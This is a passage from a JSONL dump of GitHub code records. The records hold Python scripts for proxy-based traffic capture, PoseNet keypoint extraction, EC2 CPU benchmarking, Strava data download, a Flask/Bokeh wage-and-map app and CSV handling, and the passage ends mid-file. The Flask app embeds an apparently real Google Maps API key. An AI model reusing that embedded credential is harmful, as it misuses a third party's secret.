"numpy.linspace", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 495, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 513, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 514, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 515, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 533, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 534, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 552, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 553, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 608, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 612, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 618, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 625, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 627, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 632, "usage_type": "call"}, {"api_name": "numpy.intc", "line_number": 632, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 633, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 634, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 639, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 673, "usage_type": "attribute"}]} +{"seq_id": "9353731248", "text": "from browsermobproxy import Server\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport time\r\n\r\nserver = Server(\"D:\\\\Program Files\\\\Python38\\\\works\\\\tools\\\\browsermob-proxy-2.1.4\\\\bin\\\\browsermob-proxy.bat\")\r\nserver.start()\r\nproxy = server.create_proxy()\r\n\r\nchrome_options = Options()\r\nchrome_options.add_argument('--proxy-server={0}'.format(proxy.proxy))\r\n\r\ndriver = webdriver.Chrome(chrome_options=chrome_options)\r\n# 要访问的地址\r\nbase_url = \"https://3a119.com/play/7696-1-1.html\"\r\nproxy.new_har(\"ht_list2\", options={'captureContent': True})\r\n\r\ndriver.get(base_url)\r\n# 此处最好暂停几秒等待页面加载完成,不然会拿不到结果\r\ntime.sleep(3)\r\nresult = proxy.har\r\n\r\nfor entry in result['log']['entries']:\r\n _url = entry['request']['url']\r\n print(_url)\r\n # # 根据URL找到数据接口,这里要找的是 http://git.liuyanlin.cn/get_ht_list 这个接口\r\n\r\n _response = entry['response']\r\n _content = _response['content']\r\n # 获取接口返回内容\r\n print(_response)\r\n\r\nserver.stop()\r\n", "repo_name": "liuxingmoon/tool", "sub_path": "network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 1076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "browsermobproxy.Server", "line_number": 6, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "73103012324", "text": "import tensorflow as tf\nimport cv2\nimport time\nimport argparse\nimport statistics\nimport sys\nimport posenet\nimport pandas as pd\nimport os\nimport re\n\n# CONSTANTS\nMIN_POSE_SCORE = 0.45\nMIN_KEYPOINT_SCORE = 0\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model', type=int, default=101)\nparser.add_argument('--cam_id', type=int, default=0)\nparser.add_argument('--cam_width', type=int, default=1280)\nparser.add_argument('--cam_height', type=int, default=720)\nparser.add_argument('--scale_factor', type=float, default=0.7125)\nparser.add_argument('--file', type=str, default=None, help=\"Optionally use a video file instead of a live camera\")\nparser.add_argument('--csv_loc', type=str, default=None, help=\"Location of the csv you want to create\")\nargs = parser.parse_args()\n\n\ndef main():\n with tf.Session() as sess:\n model_cfg, model_outputs = posenet.load_model(args.model, sess)\n output_stride = model_cfg['output_stride']\n\n training_data = \"../video_dataset/test\"\n training_videos = os.listdir(training_data)\n print(training_videos)\n\n for video in training_videos:\n exercise_type = re.split(\"\\d+.\", video)[0]\n cap = cv2.VideoCapture(\"{}/{}\".format(training_data, video))\n cap.set(3, args.cam_width)\n cap.set(4, args.cam_height)\n\n start = time.time()\n frame_count = 0\n rep_count = 0\n keypoints_detected = []\n people_detected = []\n all_keypoints_detected = []\n try:\n while True:\n # Read image\n input_image, display_image, output_scale = posenet.read_cap(\n cap, scale_factor=args.scale_factor, output_stride=output_stride)\n\n # Retrieve the heatmaps from the image\n heatmaps_result, offsets_result, displacement_fwd_result, displacement_bwd_result = sess.run(\n model_outputs,\n feed_dict={'image:0': input_image}\n )\n\n # Decode the heatmaps into poses and keypoints\n pose_scores, keypoint_scores, keypoint_coords = posenet.decode_multi.decode_multiple_poses(\n heatmaps_result.squeeze(axis=0),\n offsets_result.squeeze(axis=0),\n displacement_fwd_result.squeeze(axis=0),\n displacement_bwd_result.squeeze(axis=0),\n output_stride=output_stride,\n max_pose_detections=10,\n min_pose_score=MIN_POSE_SCORE)\n\n # Draw the poses onto the image\n keypoint_coords *= output_scale\n overlay_image, num_keypoints_detected, people_location, num_of_people_detected = posenet.draw_skel_and_kp(\n display_image, pose_scores, keypoint_scores, keypoint_coords,\n min_pose_score=MIN_POSE_SCORE, min_part_score=MIN_KEYPOINT_SCORE)\n\n # Store data needed to print final summaries\n frame_count += 1\n keypoints_detected.append(num_keypoints_detected)\n people_detected.append(num_of_people_detected)\n\n for i in people_location:\n all_keypoints_detected.append([i, exercise_type])\n\n cv2.putText(overlay_image, 'Rep count: {}'.format(rep_count), (53, 500), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.imshow('', overlay_image)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n except:\n print(\"Average number of key-points detected throughout the video: {}\".format(statistics.mean(keypoints_detected)))\n missing_keypoints = len([i for i in keypoints_detected if i < 17])\n extra_keypoints = len([i for i in keypoints_detected if i > 17])\n print(\"{} of the {} frames are missing atleast one keypoint\".format(missing_keypoints,\n len(keypoints_detected)))\n print(\"{} of the {} frames have atleast one extra keypoint\".format(extra_keypoints,\n len(keypoints_detected)))\n print(\"There were at most {} person(s) detected in this video\".format(max(people_detected)))\n\n print('Average FPS: ', frame_count / (time.time() - start))\n\n if max(people_detected) > 1:\n continue\n # Create the pandas DataFrame\n df = pd.DataFrame(all_keypoints_detected, columns=['keypoints', 'label'])\n # Write all of the keypoints into a csv\n # if file does not exist write header\n print(\"Writing to file\")\n if not os.path.isfile(args.csv_loc):\n df.to_csv(args.csv_loc, header=['keypoints', 'label'], index=False)\n else: # else it exists so append without writing the header\n df.to_csv(args.csv_loc, mode='a', header=False, index=False)\n\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "JamesPeralta/WorkoutRecognitionThesis", "sub_path": "posenet-tf/extract_keypoints.py", "file_name": "extract_keypoints.py", "file_ext": "py", "file_size_in_byte": 5287, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 28, "usage_type": "call"}, {"api_name": "posenet.load_model", "line_number": 29, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 33, "usage_type": "call"}, {"api_name": "re.split", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 38, "usage_type": "call"}, {"api_name": "time.time", "line_number": 42, "usage_type": "call"}, {"api_name": "posenet.read_cap", "line_number": 51, "usage_type": "call"}, {"api_name": "posenet.decode_multi.decode_multiple_poses", "line_number": 61, "usage_type": "call"}, {"api_name": "posenet.decode_multi", "line_number": 61, "usage_type": "attribute"}, {"api_name": "posenet.draw_skel_and_kp", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 84, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 84, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 87, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 90, "usage_type": "call"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}]} +{"seq_id": "34191378096", "text": "import threading\nimport requests\nimport time\nimport datetime\nimport random\nimport os\nimport boto3\nimport boto3.session\nfrom botocore.exceptions import ClientError\nimport measurehelper as mh\n\ndef measure_cpu_utilization(ec2_client, ec2_resource, cw_client, instance_id):\n instance = ec2_resource.Instance(instance_id)\n\n instance.start()\n instance.wait_until_running()\n\n start_time = datetime.datetime.utcnow().replace(microsecond=0, second=0)\n end_time = datetime.timedelta(minutes=15) + start_time\n instance.monitor()\n time.sleep(900)\n\n response = cw_client.get_metric_statistics(Namespace='AWS/EC2', MetricName='CPUUtilization', Dimensions=[\n {'Name': 'InstanceId', 'Value': instance_id}], StartTime=start_time, EndTime=end_time, Period=60, Statistics=['Average', 'Minimum', 'Maximum'])\n print(response)\n\n instance.stop()\n instance.wait_until_stopped()\n return\n\n\nec2_client_t1 = boto3.session.Session().client('ec2')\nec2_client_t2 = boto3.session.Session().client('ec2')\nec2_resource_t1 = boto3.session.Session().resource('ec2')\nec2_resource_t2 = boto3.session.Session().resource('ec2')\ncw_client_t1 = boto3.session.Session().client('cloudwatch')\ncw_client_t2 = boto3.session.Session().client('cloudwatch')\n\n\ndef benchmark_linux(ec2_client, ec2_resource, cw_client):\n results_path = '/usr/src/results'\n linux_instance_id, control_linux_instance_id = mh.retrieve_linux_instances_ids(ec2_client, ec2_resource)\n measure_cpu_utilization(ec2_client, ec2_resource, cw_client, linux_instance_id)\n\n return\n\n\ndef benchmark_osv(ec2_client, ec2_resource, cw_client):\n results_path = '/usr/src/results'\n osv_instance_id, control_osv_instance_id = mh.retrieve_osv_instances_ids(ec2_client, ec2_resource)\n measure_cpu_utilization(ec2_client, ec2_resource, cw_client, osv_instance_id)\n\n return\n\n\ntry:\n t1 = threading.Thread(target=benchmark_linux, args=(ec2_client_t1, ec2_resource_t1, cw_client_t1))\n t2 = threading.Thread(target=benchmark_osv, args=(ec2_client_t2, ec2_resource_t2, cw_client_t2))\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n\nexcept ClientError as e:\n print(e)\n exit(1)\n", "repo_name": "steffbue/unikernel-benchmark", "sub_path": "src/scripts/measure-cpu-util.py", "file_name": "measure-cpu-util.py", "file_ext": "py", "file_size_in_byte": 2209, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.utcnow", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "boto3.session.Session", "line_number": 32, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 32, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 33, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 33, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 34, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 34, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 35, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 35, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 36, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 36, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 37, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 37, "usage_type": "attribute"}, {"api_name": "measurehelper.retrieve_linux_instances_ids", "line_number": 42, "usage_type": "call"}, {"api_name": "measurehelper.retrieve_osv_instances_ids", "line_number": 50, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 57, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 58, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "17839599688", "text": "import argparse\nimport requests as re\nimport ujson\n\nfrom datetime import datetime\n\nparser = argparse.ArgumentParser(description='get activity data')\nparser.add_argument('--token', help='access token for the request')\n\nif __name__==\"__main__\":\n args = parser.parse_args()\n token = args.token\n\n headers = {\n 'accept': \"application/json\",\n 'authorization': f\"Bearer {token}\",\n 'content-type': \"application/json\",\n }\n url = \"https://www.strava.com/api/v3/athlete/activities\"\n\n results = re.get(url=url, headers=headers)\n\n if results.status_code == 200:\n\n current_time = datetime.today().strftime('%Y%m%d%H%M')\n with open(f'data/activities_{current_time}.json', 'w') as jsonfile:\n ujson.dump(results.json(), jsonfile)", "repo_name": "alwalms/strava-api", "sub_path": "scripts/get_activity_data.py", "file_name": "get_activity_data.py", "file_ext": "py", "file_size_in_byte": 767, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 25, "usage_type": "name"}, {"api_name": "ujson.dump", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "5723928553", "text": "import shutil\nimport os\nfrom tkinter import *\n\nimport utils\n\n\nclass Disks:\n def drawDiskWindow(self):\n # Functions\n if True:\n def getFiles(folder):\n files, folders = [], []\n for f in os.listdir(folder):\n if os.path.isfile(folder + \"/\" + f):\n files.append(f)\n else:\n if f != \"Torrents\":\n folders.append(f)\n a, b = getFiles(folder + \"/\" + f)\n files += a\n folders += b\n return files, folders\n\n def size_format(size):\n units = (\"b\", \"Kb\", \"Mb\", \"Gb\", \"Tb\")\n u = 0\n while u < len(units) - 1:\n if size >= 1000:\n size = size // 1000\n u += 1\n else:\n break\n return f'{size:,}' + \" \" + units[u]\n\n def exit(e=None):\n self.diskWindow.destroy()\n\n # Window init - Fancy corners - Events\n if True:\n disk = self.animePath.split(\"/\")[0]\n if self.diskWindow is None or not self.diskWindow.winfo_exists():\n size = (self.diskWindowMinWidth, self.diskWindowMinHeight)\n self.diskWindow = utils.RoundTopLevel(\n self.initWindow,\n title=\"Disk \" + disk,\n minsize=size,\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4'])\n else:\n self.diskWindow.clear()\n self.diskWindow.focus()\n\n # Bars\n if True:\n barFrame = Frame(self.diskWindow, bg=self.colors['Gray2'])\n length = 500\n radius = 25\n usageColors = {75: 'Green', 90: 'Orange', 100: 'Red'}\n total, used, free = shutil.disk_usage(disk)\n usedSize = length * used / total\n usedPrct = used / total * 100\n for p, c in list(usageColors.items())[::-1]:\n if usedPrct <= p:\n color = c\n\n # self.diskWindow.titleLbl.configure(text=\"Disk \"+disk, font=(\"Source Code Pro Medium\",20),\n # bg= self.colors['Gray2'], fg= self.colors['Gray4'],)\n\n bar = Canvas(\n barFrame,\n bg=self.colors['Gray2'],\n width=length,\n height=radius * 2,\n highlightthickness=0,\n )\n bar.create_line(\n radius,\n radius,\n length - radius,\n radius,\n capstyle='round',\n fill=self.colors['Gray4'],\n width=radius)\n bar.create_line(\n radius,\n radius,\n usedSize - radius,\n radius,\n capstyle='round',\n fill=self.colors[color],\n width=radius)\n bar.grid(row=1, column=0, columnspan=3)\n Label(\n barFrame,\n text=\"%d GB used\" % (used // (2**30)),\n wraplength=900,\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=2, column=0)\n Label(\n barFrame,\n text=\"%d GB total\" % (total // (2**30)),\n wraplength=900,\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=2, column=1)\n Label(\n barFrame,\n text=\"%d GB free\" % (free // (2**30)),\n wraplength=900,\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=2, column=2)\n barFrame.grid_columnconfigure(1, weight=1)\n barFrame.pack(pady=20)\n\n # Size info\n if True:\n cache_size = sum(os.path.getsize(os.path.join(self.cache, f)) for f in os.listdir(self.cache))\n db_size = os.path.getsize(self.dbPath)\n\n sizeFrame = Frame(self.diskWindow, bg=self.colors['Gray2'])\n Label(\n sizeFrame,\n text=\"Cache size:\",\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=0, column=0)\n Label(\n sizeFrame,\n text=size_format(cache_size),\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=0, column=1)\n\n Label(\n sizeFrame,\n text=\"Database size:\",\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=1, column=0)\n Label(\n sizeFrame,\n text=size_format(db_size),\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=1, column=1)\n [sizeFrame.grid_columnconfigure(i, weight=1) for i in range(2)]\n sizeFrame.pack(pady=20)\n\n # Stats info\n if True:\n fileFrame = Frame(self.diskWindow, bg=self.colors['Gray2'])\n t = Label(\n fileFrame,\n text=\"Animes folder:\",\n wraplength=900,\n font=(\n \"Source Code Pro Medium\",\n 20),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4'])\n t.grid(row=0, column=0, columnspan=2)\n files, folders = getFiles(self.animePath)\n Label(\n fileFrame,\n text=\"%d files - %d folders\" %\n (len(files),\n len(folders)),\n wraplength=900,\n font=(\n \"Source Code Pro Medium\",\n 15),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']).grid(\n row=1,\n column=0,\n sticky=\"nsew\")\n # [fileFrame.grid_columnconfigure(i,weight=1) for i in range(2)]\n fileFrame.pack(pady=20)\n", "repo_name": "WiredMind2/AnimeManager", "sub_path": "windows/disks.py", "file_name": "disks.py", "file_ext": "py", "file_size_in_byte": 6612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "utils.RoundTopLevel", "line_number": 44, "usage_type": "call"}, {"api_name": "shutil.disk_usage", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 123, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}]} +{"seq_id": "1329942755", "text": "from flask import Flask, render_template, request, redirect, jsonify\nimport pandas as pd\nimport numpy as np\nfrom bokeh.models import PrintfTickFormatter, LinearAxis, Range1d\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh import embed\nfrom bokeh.models import (\n GMapPlot, GMapOptions, ColumnDataSource, Circle, Range1d, PanTool, WheelZoomTool, BoxSelectTool\n)\n\n\n\napp = Flask(__name__)\n\n# Load the dataset\ndf_info=pd.read_csv('df_info.csv')\ndf_map=pd.read_csv('df_map.csv')\nus_state_abbrev = {\n 'ALABAMA': 'AL',\n 'ALASKA': 'AK',\n 'ARIZONA': 'AZ',\n 'ARKANSAS': 'AR',\n 'CALIFORNIA': 'CA',\n 'COLORADO': 'CO',\n 'CONNECTICUT': 'CT',\n 'DELAWARE': 'DE',\n 'FLORIDA': 'FL',\n 'GEORGIA': 'GA',\n 'HAWAII': 'HI',\n 'IDAHO': 'ID',\n 'ILLINOIS': 'IL',\n 'INDIANA': 'IN',\n 'IOWA': 'IA',\n 'KANSAS': 'KS',\n 'KENTUCKY': 'KY',\n 'LOUISIANA': 'LA',\n 'MAINE': 'ME',\n 'MARYLAND': 'MD',\n 'MASSACHUSETTS': 'MA',\n 'MICHIGAN': 'MI',\n 'MINNESOTA': 'MN',\n 'MISSISSIPPI': 'MS',\n 'MISSOURI': 'MO',\n 'MONTANA': 'MT',\n 'NEBRASKA': 'NE',\n 'NEVADA': 'NV',\n 'NEW HAMPSHIRE': 'NH',\n 'NEW JERSEY': 'NJ',\n 'NEW MEXICO': 'NM',\n 'NEW YORK': 'NY',\n 'NORTH CAROLINA': 'NC',\n 'NORTH DAKOTA': 'ND',\n 'OHIO': 'OH',\n 'OKLAHOMA': 'OK',\n 'OREGON': 'OR',\n 'PENNSYLVANIA': 'PA',\n 'RHODE ISLAND': 'RI',\n 'SOUTH CAROLINA': 'SC',\n 'SOUTH DAKOTA': 'SD',\n 'TENNESSEE': 'TN',\n 'TEXAS': 'TX',\n 'UTAH': 'UT',\n 'VERMONT': 'VT',\n 'VIRGINIA': 'VA',\n 'WASHINGTON': 'WA',\n 'WEST VIRGINIA': 'WV',\n 'WISCONSIN': 'WI',\n 'WYOMING': 'WY',\n 'DISTRICT OF COLUMBIA': 'DC',\n 'PUERTO RICO': 'PR'\n}\n\n\n@app.route('/',methods=['GET','POST'])\ndef index():\n# return render_template('index.html')\n\n if request.method == 'GET':\n return render_template('index.html')\n else:\n statein=request.form['state']\n stateout=str(statein).upper()\n feature=request.form.getlist('feature')\n featurenumber=len(feature)\n plottype=feature[0]\n \n if stateout not in us_state_abbrev.values():\n return 'Please type the abbreviation of your state!'\n \n \n if (featurenumber==2 or featurenumber==0):\n return 'Please select one and only one exploration!'\n \n elif plottype=='boxplot':\n df=df_info[df_info['state']==stateout].set_index('year')\n years = ['2011','2012','2013','2014','2015','2016','2017']\n q1 = df['q25']\n q2 = df['median']\n q3 = df['q75']\n iqr = q3 - q1\n upper= q3 + 1.5*iqr\n lower = q1 - 1.5*iqr\n count=df['count'].values\n ylim=max(count)*1.1\n\n p = figure(tools=\"save\", background_fill_color=\"#EFE8E2\", title=\"Box plot of Wage in \"+str(stateout), x_range=years, x_axis_label='Year', y_axis_label='Wage in $')\n\n # stems\n p.segment(years, upper, years, q3, line_color=\"black\")\n p.segment(years, lower, years, q1, line_color=\"black\")\n\n # boxes\n p.vbar(years, 0.7, q2, q3, fill_color=\"#E08E79\", line_color=\"black\")\n p.vbar(years, 0.7, q1, q2, fill_color=\"#3B8686\", line_color=\"black\")\n\n # whiskers (almost-0 height rects simpler than segments)\n p.rect(years, lower, 0.2, 0.01, line_color=\"black\")\n p.rect(years, upper, 0.2, 0.01, line_color=\"black\")\n\n p.xgrid.grid_line_color = None\n p.ygrid.grid_line_color = \"white\"\n p.grid.grid_line_width = 2\n p.xaxis.major_label_text_font_size=\"12pt\"\n p.left[0].formatter.use_scientific = False\n #p.y_range = Range1d(0, max(upper)*1.1)\n\n p.extra_y_ranges = {\"foo\": Range1d(start=0, end=ylim)}\n p.add_layout(LinearAxis(y_range_name=\"foo\", axis_label=\"Petition Number\"), 'right')\n p.right[0].formatter.use_scientific = False\n p.line(['2011','2012','2013','2014','2015','2016','2017'], count, line_width=2, color=\"blue\", y_range_name=\"foo\",legend=\"petition number\") \n # Embed plot into HTML via Flask Render\n script, div = embed.components(p)\n #show(p)\n return render_template('graph.html', script=script, div=div)\n \n else:\n \n df=df_map\n lat=df[df['state']==stateout]['lat']\n lon=df[df['state']==stateout]['lon']\n count=df[df['state']==stateout]['status']\n maxcount=max(count.values)\n enlarge=float(50)/maxcount\n centerpoint_lat=df[df['state']==stateout].loc[df[df['state']==stateout]['status'].argmax()]['lat']\n centerpoint_lon=df[df['state']==stateout].loc[df[df['state']==stateout]['status'].argmax()]['lon']\n\n map_options = GMapOptions(lat=centerpoint_lat, lng=centerpoint_lon, map_type=\"roadmap\", zoom=8)\n \n plot = GMapPlot(x_range=Range1d(), y_range=Range1d(), map_options=map_options)\n plot.title.text = stateout\n plot.api_key = \"AIzaSyAGF5nTCoxmIGu011TQFLlCjbdGOEF-rUI\"\n\n source = ColumnDataSource(\n data=dict(\n lat=lat,\n lon=lon,\n size=count*enlarge\n )\n )\n\n circle = Circle(x=\"lon\", y=\"lat\",size='size', fill_color=\"blue\", fill_alpha=0.8, line_color=None)\n plot.add_glyph(source, circle)\n plot.add_tools(PanTool(), WheelZoomTool(), BoxSelectTool())\n script, div = embed.components(plot)\n\n \n\n return render_template('graph.html', script=script, div=div)\n \n\nif __name__ == '__main__':\n app.run(port=33507)\n", "repo_name": "zhengxiaowan/kellytdi", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5766, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "bokeh.plotting.figure", "line_number": 106, "usage_type": "call"}, {"api_name": "bokeh.models.Range1d", "line_number": 127, "usage_type": "call"}, {"api_name": "bokeh.models.LinearAxis", "line_number": 128, "usage_type": "call"}, {"api_name": "bokeh.embed.components", "line_number": 132, "usage_type": "call"}, {"api_name": "bokeh.embed", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 134, "usage_type": "call"}, {"api_name": "bokeh.models.GMapOptions", "line_number": 147, "usage_type": "call"}, {"api_name": "bokeh.models.GMapPlot", "line_number": 149, "usage_type": "call"}, {"api_name": "bokeh.models.Range1d", "line_number": 149, "usage_type": "call"}, {"api_name": "bokeh.models.ColumnDataSource", "line_number": 153, "usage_type": "call"}, {"api_name": "bokeh.models.Circle", "line_number": 161, "usage_type": "call"}, {"api_name": "bokeh.models.PanTool", "line_number": 163, "usage_type": "call"}, {"api_name": "bokeh.models.WheelZoomTool", "line_number": 163, "usage_type": "call"}, {"api_name": "bokeh.models.BoxSelectTool", "line_number": 163, "usage_type": "call"}, {"api_name": "bokeh.embed.components", "line_number": 164, "usage_type": "call"}, {"api_name": "bokeh.embed", "line_number": 164, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "31343033936", "text": "# getting_data.py\n\n# Just stick some data there\n#with open('email_addresses.txt', 'w') as f: #the file auto closed at the end of with block\n# f.write(\"chenwenyu027@gmail.com\\n\")\n# f.write(\"chenwenyu077@live.com\\n\")\n# f.write(\"wenyu.chen@nokia-sbell.com\\n\")\n \ndef get_domain(email_address: str) -> str:\n \"\"\"Split on '@' and return the last piece\"\"\"\n return email_address.lower().split(\"@\")[-1]\n\nprint(get_domain(\"chenwenyu077@live.com\"))\nprint(get_domain(\"wenyu.chen@nokia-sbell.com\"))\n\n#with open('tab_delimited_stock_prices.txt', 'w') as f:\n# f.write(\"\"\"6/20/2014\\tAAPL\\t90.91\n#6/20/2014\\tMSFT\\t41.68\n#6/20/2014\\tFB\\t64.5\n#6/19/2014\\tAAPL\\t91.86\n#6/19/2014\\tMSFT\\t41.51\n#6/19/2014\\tFB\\t64.34\n#\"\"\")\n\nimport csv\n\ndef process(date: str, symbol: str, closing_price: float) -> None:\n # Imaginge that this function actually does something.\n #assert closing_price > 0.0\n print(date, symbol, closing_price)\n \nwith open('tab_delimited_stock_prices.txt', 'r') as f:\n tab_reader = csv.reader(f, delimiter='\\t')\n for row in tab_reader:\n date = row[0]\n symbol = row[1]\n closing_price = row[2]\n process(date, symbol, closing_price)\n\n#with open('colon_delimited_stock_prices.txt', 'w') as f:\n# f.write(\"\"\"date:symbol:closing_price\n#6/20/2014:AAPL:90.91\n#6/20/2014:MSFT:41.68\n#6/20/2014:FB:64.5\n#\"\"\")\n\nwith open('colon_delimited_stock_prices.txt','r') as f:\n colon_reader = csv.DictReader(f, delimiter = ':')\n for dict_row in colon_reader:\n date = dict_row[\"date\"]\n symbol = dict_row[\"symbol\"]\n closing_price = float(dict_row[\"closing_price\"])\n process(date, symbol, closing_price)\n \ntoday_prices = {'AAPL': 90.91, 'MSFT': 41.68, 'FB': 64.5}\n\nwith open('comma_delimited_stock_prices.txt', 'w') as f:\n csv_writer = csv.writer(f, delimiter = ',')\n for stock, price in today_prices.items():\n 